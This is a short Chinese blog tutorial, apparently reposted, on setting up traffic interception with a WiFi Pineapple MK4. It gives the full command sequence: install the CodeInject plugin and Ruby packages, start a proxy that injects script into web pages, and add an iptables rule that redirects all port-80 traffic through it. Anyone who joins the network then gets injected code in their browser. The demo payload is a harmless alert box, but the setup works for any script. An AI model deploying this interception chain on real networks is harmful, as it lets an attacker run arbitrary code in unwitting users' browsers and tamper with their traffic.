文章出處
文章列表
如果在中間人攻擊的時候, 能在用戶的網頁中插入任意代碼, 可以說已經完成一半了
wifipineapple有個codeInject插件, 可以讓連上這個網絡所有設備瀏覽網頁的時候, 在網頁中插入任意html代碼
但是目前我用的wifipineapple版本是MK4, 官方很久不維護這個版本的wifipineapple
使用scp把本地的codeinject傳到wifipineapple的 /pineapple/components/infusions/目錄下
scp -r codeinject root@172.16.42.1:/pineapple/components/infusions
然后把opkg的源改成:
http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/
執行
opkg update opkg install ruby-cgi opkg install ruby-core opkg install ruby-enc opkg install ruby-gems
cd進入 /pineapple/components/infusions/codeinject 目錄,修正ruby執行socket, getAddrInfo的錯誤:
cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linux ln -s /usb/usr/lib/ruby /usr/lib/ruby
cd進入 /pineapple/components/infusions/codeinject/includes/proxy 目錄, 執行命令:
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/lib export PATH=$PATH:/usb/usr/bin:/usb/usr/sbin ruby -Kn proxy.rb --verbose --script-inject "<script>alert(1)</script>"
添加本地數據轉發:
iptables -t nat -A PREROUTING -i br-lan -p tcp --destination-port 80 -j REDIRECT --to-ports 8888
此時連接上該wifi所有用戶,瀏覽網頁的時候,會彈出彈窗:1
EOF
作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
文章列表
全站熱搜
留言列表
